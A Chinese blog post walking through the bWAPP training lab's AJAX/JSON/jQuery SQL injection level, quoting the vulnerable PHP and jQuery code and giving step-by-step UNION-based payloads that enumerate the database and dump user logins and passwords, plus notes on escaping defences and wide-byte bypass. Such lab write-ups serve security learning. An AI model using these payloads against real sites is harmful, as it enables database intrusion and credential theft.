bWAPP-SQLInjection-AJAXJSONjQuery

最新推荐文章于 2021-09-18 02:36:09 发布
最新推荐文章于 2021-09-18 02:36:09 发布
阅读量202 收藏
点赞数
分类专栏: bWAPP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hee_mee/article/details/108719721
版权

AJAX/JSON/jQuery注入

常规流程

1.判断是否存在注入,注入是字符型还是整数型

2.猜解SQL查询语句中的字段数 (order by )

3.确定显示的字段顺序

4.获取当前数据库 (爆库)

5.获取数据库中的表 (爆表)

6.获取表中的字段名 (爆字段)

7.下载数据 (爆数据)

基础知识

什么是AJAX/JSON/jQuery

通过在后台与服务器进行少量数据交换,AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行实时更新。

AJAX/JSON/jQuery

代码分析

//sqli_10-1.php
<script>
 
        $("#title").keyup(function(){                // #title为表格的ID值
            // Searches for a movie title
            var search = {title: $("#title").val()}; //获取输入的值,制成JSON格式

            // AJAX call
        	//getJSON(url,data,success(data,status,xhr))
            $.getJSON("sqli_10-2.php", search, function(data){ //data 接收返回的数据
                init_table();								 //初始化表头
                // Constructs the table from the JSON data
                var total = 0;
                $.each(data, function(key, val){			//循环输出JSON数据,制成表格
                    total++;
                    $("#table_yellow tr:last").after("<tr><td>" + val.title + "</td><td align='center'>" + val.release_year + "</td><td>" + val.main_character + "</td><td align='center'>" + val.genre + "</td><td align='center'><a href='http://www.imdb.com/title/" + val.imdb + "' target='_blank'>Link</a></td></tr>");
                });
                // Empty result
                if (total == 0)
                {
                    $("#table_yellow tr:last").after("<tr height='30'><td colspan='5' width='580'>No movies were found!</td></tr>");
                }
            })

        });
    </script>

//"sqli_10-2.php
if(!empty($_GET["title"]))    //接收数据,并使用自定义函数sqli()对数据进行消毒
{
    // Retrieves the movie title
    $title = $_GET["title"];
    // Constructs the query
    $sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'";
    // Queries the database
    $recordset = mysql_query($sql, $link);
    // Fetches the result
    if(mysql_num_rows($recordset) != 0)
    {
        while($row = mysql_fetch_array($recordset))
        {
            $movies[] = $row;
        }
    }
    else
    {
        $movies = array();
    }
}
else
{
    $movies = array();
}

getJSON

演练

low

  1. 判断是否存在注入

    a%' and 1=1 #

在这里插入图片描述

  1. 判断注入字段个数

    a%' order by 7 #
a%' order by 8 #

在这里插入图片描述
在这里插入图片描述

  1. 判断注入字段位置

    a%' union select 1,2,3,4,5,6,7 limit 9,1#

在这里插入图片描述

  1. 获取数据库信息

    a%' union select 1,database(),version(),user(),5,6,7 limit 9,1#

在这里插入图片描述

  1. 获取表名

    a%' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6,7 limit 9,1#

在这里插入图片描述

  1. 获取列名

    a%' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema=database()),3,4,5,6,7 limit 9,1#

在这里插入图片描述

  1. 获取信息

    a%' union select 1,(select group_concat(login,'-',password,'-') from users),3,4,5,6,7 limit 9,1#

在这里插入图片描述

mid/high

分别用了addslashes()和mysql_real_escape_string()函数防御

查看mysql编码, 如果是GBK编码且操作系统是UTF-8编码, 则可以用宽字节来绕过:

可惜mysql编码是utf-8:

ThokuG-1600695053041)]

mid/high

分别用了addslashes()和mysql_real_escape_string()函数防御

查看mysql编码, 如果是GBK编码且操作系统是UTF-8编码, 则可以用宽字节来绕过:

可惜mysql编码是utf-8:

hee_mee
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ORACLE LATERAL-SQL-INJECTION 个人见解
09-14
Oracle Lateral SQL Injection 是一种针对Oracle数据库的新型SQL注入攻击技术,主要出现在SQL语句的动态构造和数据类型转换过程中。这种攻击模式尤其在处理DATE和NUMBER类型转换为VARCHAR时出现,由于格式字符的问题...
Skills Assessment - SQL Injection Fundamentals Write Up.pdf
07-21
Hack The Box - SQL Injection Fundamentals Module详细讲解中文教程-实战训练解析
linux jsonsql注入,sql注入AJAXSQL Injection (AJAX/JSON/jQuery))
weixin_39777242的博客
05-19 188
sql注入AJAX(SQL Injection (AJAX/JSON/jQuery))0x1网上搜下没有关于ajaxsql注入文章,这里简单写一下抛砖引玉。原理自己百度,这里简单说下:通过在后台与服务器进行少量数据交换,AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行实时更新。0x2我这里用一个漏洞示例程序bWAPP来演示,先看下正常访问的情况:输...
SQL Injection (AJAX/JSON/jQuery)
qq_40554015的博客
09-18 384
1.AJAX/JSON/jQuery (1)AJAX 通过在后台与服务器进行少量数据交换,AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行实时更新。 (2)JSON JSON (JavaScript Object Notation) 是一种轻量级的数据交换格式。 是一种数据格式。 (3)jQuery jQuery 是一个 JavaScript 库,使用jQuery不仅能够将原本需要很多JavaScript 码才能实现的功能缩减为几行代码,还提供..
sql注入AJAXSQL Injection (AJAX/JSON/jQuery))
weixin_34409822的博客
10-14 1673
2019独角兽企业重金招聘Python工程师标准>>> ...
bwapp通关(全完结)
热门推荐
hxhxhxhxx的博客
10-20 1万+
bwapp/ A1 - Injection /HTML Injection - Reflected (GET)HTML Injection - Reflected (POST)HTML Injection - Reflected (Current URL)HTML Injection - Stored (Blog)iFrame InjectionLDAP Injection (Search)【待开化】 ---------------------- bWAPP v2.2 -----------------
bwapp 随笔
freshfox的博客
08-11 2116
SQL Injection (GET/Search) C:\Python27\sqlmap>python sqlmap.py  -u  "http://localhost/bwapp/sqli_1.php?titl e=sfsdf&action=search"  --cookie="PHPSESSID=k60mg7l865e7l5jrp9gr8l6c84;security_
ART OF WEB-SQL-INJECTION第2卷 ORACLE篇
09-14
SQL注入】是一种常见的网络安全漏洞,发生在Web应用程序中,攻击者通过输入恶意的SQL语句来控制或篡改数据库。本文主要关注Oracle数据库的SQL注入问题,因为相对于其他数据库,如MySQL、POSTGRESQLSQLite,...
wjz-sqlFormat
08-23
格式化后接近PLSQL格式化效果。
jupyterlab-sql:JupyterLabSQL GUI
01-30
jupyterlab-sql jupyterlab-sql向JupyterLab添加了一个SQL用户界面: 通过点击界面浏览表 使用自定义查询读取和修改数据库 安装 在JupyterLab 1.x上安装 要安装jupyterlab-sql ,请运行以下命令: pip install ...
AJAX/JSON/jQuery
cainiao_00001的博客
09-28 259
AJAX 主要作用 局部刷新和异步交互 什么是AJAX Asynchoronized javaScript And Xml 异步JS和XMl AJAX的技术构成 以JS 为主的操作语言; 以HTML为显示骨架;以css作为渲染手段; 以xml 和JSON作为数据传输格式; 请求和响应的核心对象 是 异步请求对象 类型是XML HttpRequest AJAX ...
玩转Web之Json(二)----jquery easy ui + Ajax +Json+SQL实现前后台数据交互
iteye_8029的博客
03-14 148
最近在学Json,在网上也找过一些资料,觉得有点乱,在这里,我以easy ui的登录界面为例来说一下怎样用Json实现前后台的数据交互 使用Json,首先需要导入一些jar包,这些资源可以在网上下载到,然后导入到项目中即可。 首先我先把代码贴出来,有些地方会着重说明一下: 客户端代码如下: &lt;%@page pageEncoding="utf-8"%&gt; &lt;!DOCTYPE ...
php sql json注入,sql注入AJAXSQL Injection (AJAX/JSON/jQuery))
weixin_36268390的博客
03-13 275
sql注入AJAX(SQL Injection (AJAX/JSON/jQuery))0x1网上搜下没有关于ajaxsql注入文章,这里简单写一下抛砖引玉。原理自己百度,这里简单说下:通过在后台与服务器进行少量数据交换,AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行实时更新。0x2我这里用一个漏洞示例程序bWAPP来演示,先看下正常访问的情况:输...
BWAPP之SQL注入通关
qq_43665434的博客
04-17 2759
1、SQL injection(GET/search) low 输入单引号直接报错,说明有注入点 直接order by二分法得出主查询字段数为7 直接union注入,测出回显点为2,3,4,5 查数据库信息: 测出数据库名为bwapp,用户为root,版本为5.5.53 查询表名: 查询字段名: 查字段值: 没有难度。 medium 尝试多种方法都不行,看了一眼源码: 发现是用addslashes()进行转义的,尝试了下宽字节绕过,也不行。 看了下原来数据库采用的是urf8编码,本来想改成g..
基于Jquery+Ajax+Json+高效分页
沉默的鲨鱼的专栏
04-21 4948
转载地址:http://www.cnblogs.com/Jusoc/archive/2011/08/28/2156530.html   为了保护原作者不辞辛苦的原创,所以原封不动的复制过来了   摘要 分页我相信大家存储过程分页已经很熟悉了,ajax更是耳熟能详了,更别说我们的json,等等。 如果说您没用过这些东东的话,我相信看完这篇博文会对您有帮助的,,如果有任何问
BwApp学习记录
weixin_33788244的博客
07-24 445
下载&安装bwapp可以单独下载,然后部署到apache+php+mysql的环境,也可以下载他的虚拟机版本bee-box,但是有好多漏洞是bee-box里边有,但单独安装bwapp没有的,比如破壳漏洞,心脏滴血漏洞等。我这里主要用bee-box进行介绍。下载地址【传送门】开始搞事情0x00 HTML Injection - Reflected (GET)【...
bWAPP-SQLInjection2
hee_mee的博客
09-20 122
zeroNil
bWAPP解题笔记——XSS
FunkyPants的博客
09-06 3891
XSS 在chrome上,需要先关闭xss保护 反射型 low 对输入未做过滤 $data = no_check($data); 输入&lt;script&gt;alert(document.cookie)&lt;/script&gt; middle 输入校验 function xss_check_4($data) { // addsla...
Ajax时代 SQL注入依然是隐患
weixin_33725270的博客
10-02 226
许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问),根据程序返回的结果,获得某些想得知的数据,这就是所谓的SQL Injection,即SQL注入SQL注入通过网页对网站数据库进行修改。它能够直接在数据库中添加具有管理员权限的用户,从而最终获得系统管理员权限。黑客可以利...
SQL SERVER实用教程 T-SQL语言.pdf
最新发布
04-17
"SQL SERVER实用教程 T-SQL语言.pdf" 这篇教程详细介绍了SQL Server中的T-SQL语言,T-SQLSQL语言的一个特定版本,专用于微软的MSSQL-Server和Sybase Adaptive Server系列数据库。SQL,即结构化查询语言,起初由...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值